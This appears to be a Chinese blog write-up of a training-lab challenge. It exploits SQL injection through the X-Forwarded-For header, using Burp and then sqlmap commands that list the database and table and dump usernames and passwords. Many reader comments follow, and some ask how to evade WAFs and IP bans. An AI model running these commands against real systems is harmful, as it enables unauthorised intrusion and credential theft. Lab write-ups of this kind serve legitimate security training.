枫少@KillBoy
9247,0961字数 79阅读0分15秒阅读模式
AI智能摘要
你以为X-Forwarded-For只是个普通HTTP头?本文直击墨者学院实战案例:如何通过篡改这一头部字段,触发隐蔽SQL注入漏洞。手把手演示Burp抓包、sqlmap爆破数据库及凭证提取全过程,从漏洞利用到获取管理员KEY的关键步骤毫无保留。读完你将掌握Web渗透的核心攻防逻辑,洞悉企业级应用的安全盲区——安全工程师必备的实战技能,从此告别理论空谈。
— AI 生成的文章内容摘要
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示
2.爆出当前的数据库
sqlmap -r 1.txt --current-db --batch
3.爆表名
sqlmap -r 1.txt -D webcalendar -T user --columns --batch
4.爆表中的字段
sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
5.得到帐号密码
6.登陆获得KEY
湖北省荆州市 1F
求问x-forwarded-for必须大写吗?
澳大利亚 2F
之前搞渗透测试也用这招,一打一个准😂
印度尼西亚 3F
sqlmap -r直接跑,省事是省事,但遇到WAF就歇菜了
韩国 4F
burp抓包那步能不能用其他工具替代?
广东省 B1
@ 爱做梦的蜗牛 fiddler也能抓,改header一样操作
四川省成都市 5F
这payload现在多数网站都拦截了吧
山东省临沂市 B1
@ 草莓酸奶 burp太重了,有时候直接curl写脚本更顺手
中国 6F
老用户表示这种漏洞现在少见了,防护都升级了
河南省新乡市 7F
看到txt存文件这步莫名亲切,以前也这么干过
湖北省宜昌市 8F
webcalendar这个表名有点意思,是哪个CMS?
陕西省汉中市 9F
密码都爆出来了还dump啥,赶紧登啊
上海市 B1
@ 银河闪光 你真敢直接登录?万一被反制或者日志报警咋办
日本 B1
@ 银河闪光 有时候dump是为了拿更多数据,光密码哪够啊
新加坡 10F
这玩意儿现在确实不太好使了,多数都加了waf过滤
澳大利亚 11F
这个payload现在还能用吗?
江苏省无锡市 B1
@ 寒露菊韵 这漏洞现在多半一跑就触发告警了吧
重庆市 B1
@ 寒露菊韵 payload公开了会不会被蜜罐盯着啊
北京市 12F
webcalendar是啥系统,没听说过
河北省衡水市 13F
burp用不习惯,有更简单的工具推荐不
山东省淄博市 B1
@ ThanatosEnd burp还是得练啊,别人都用得溜就我卡壳😭
日本 14F
之前遇到过类似漏洞,折腾半天才搞定
印度 15F
这种老系统漏洞还挺多的
山东省青岛市 B1
@ 无目的地的船 老系统多的是凑合用的,根本没心思升级
韩国 B1
@ 无目的地的船 webcalendar不会是哪个老单位内部系统吧
泰国 16F
x-forwarded-for头大小写有区别吗
广东省江门市 17F
直接dump密码也太简单了吧😂
广东省 18F
新手表示有点看不懂
山东省济南市 19F
这教程步骤挺清晰的
日本 B1
@ 小飞 步骤确实一环扣一环,看着不迷糊
福建省泉州市 B1
@ 小飞 步骤是真清楚,连图都标得明明白白
福建省南平市建阳市 B1
@ 小飞 sqlmap配-r确实省事,但内网扫一下直接被拦
河南省郑州市 20F
WAF现在确实防得严,不好搞了
泰国 21F
这头大小写真有讲究?试过小写好像也成
澳大利亚 22F
webcalendar该不会是某个老日程系统吧
北京市 23F
sqlmap配-r确实方便,但公司内网一跑就被拦
辽宁省大连市 B1
@ 海岸行者 -r参数是方便,但内网一动就告警,根本不敢扫
湖北省宜昌市 24F
我去,这漏洞现在还能复现吗
上海市 25F
之前搞过类似注入,waf一开直接歇菜
北京市 26F
感觉还行
江苏省常州市 27F
那个啥,payload都公开了会不会被盯上啊
吉林省长春市 28F
直接登账号不香吗,非得dump半天
澳大利亚 29F
这方法现在怕是走不通了,防护太严
韩国 30F
这注入手法太经典了,老系统真经不起折腾
北京市 31F
webcalendar听着像二十年前的老系统,谁还在用啊
广东省深圳市 32F
直接dump密码看着爽,实际中间一堆过滤😂
广东省深圳市宝安区 33F
x-forwarded-for现在不光看头,IP链都校验了,难顶
香港 34F
老系统才敢这么玩,新项目早上waf了
陕西省延安市 B1
@ 末日预言者 老系统才经得起这么折腾,新项目一跑就被拦了
台湾省 35F
求问有没有不用burp的方案啊
河北省唐山市 36F
x-forwarded-for现在基本都被过滤了吧
陕西省渭南市富平县 37F
看到dump那步就想笑,实际哪有这么顺利
日本 38F
之前折腾一个月权限都没拿下,太难了
陕西省咸阳市 39F
这流程看着简单,实操一堆坑
江苏省常州市 40F
key拿到了然后呢,还有后续吗
日本 41F
666,但这环境太理想了
天津市 42F
这方法现在还能用?服务器早拦截了
辽宁省本溪市 B1
@ 社牛小火山口 这payload现在基本被WAF干掉了,也就教学能用
陕西省咸阳市 43F
x-forwarded-for头现在基本都被waf识别了
河北省石家庄市 44F
之前搞渗透也是用这招,现在不好使了😂
浙江省 45F
新手求问,sqlmap配-r参数有啥优势?
菲律宾 46F
webcalendar这系统现在还有人用吗?
上海市 47F
直接dump密码这么简单?实际环境肯定不行
湖北省十堰市 48F
burp用着太麻烦了,有没有更轻量的工具
北京市 49F
看到存txt这步,想起当年也是这么折腾的
中国 50F
这payload现在一用就被封ip吧
台湾省 51F
老系统漏洞是多,但现在哪找这么脆弱的靶场
韩国 52F
用burp改头的时候老被拦截,有啥办法不?
吉林省长春市 53F
webcalendar这系统现在还有人用吗?看着挺老的。
广东省东莞市 54F
payload都公开了不怕被盯上?
湖南省长沙市 55F
sqlmap还能这么用,学到了
北京市 B1
@ value25 这招挺实用的
湖南省长沙市 56F
流量一大就被ban ip,太难受了
安徽省安庆市 57F
之前搞过一次,结果waf日志全留着,吓死了
新西兰 58F
x-forwarded-for大小写真有影响?试了几次懵了
韩国 59F
求问不用burp的话,curl能实现吗?
辽宁省 60F
看到dump那步就觉得玄乎,哪有这么顺利的
广东省汕尾市 61F
第一步就存txt,小白操作😂
浙江省 62F
-r参数省去手写请求头,效率高点
台湾省 63F
内网跑sqlmap秒被ban,求问怎么绕
湖南省益阳市 64F
之前用burp改请求头,被waf日志记录了,慌得一批
印度 65F
直接dump密码这么顺利?我试过几次都报错
上海市长宁区 66F
webcalendar是啥老系统,没听过呢
广东省汕头市 67F
这payload现在还能用不,求个测试站
广东省广州市 68F
流量一大就被封ip,怎么破
北京市 69F
这教程也就老系统能用,新项目早防护了
辽宁省丹东市 70F
x-forwarded-for头现在基本被过滤了,没啥用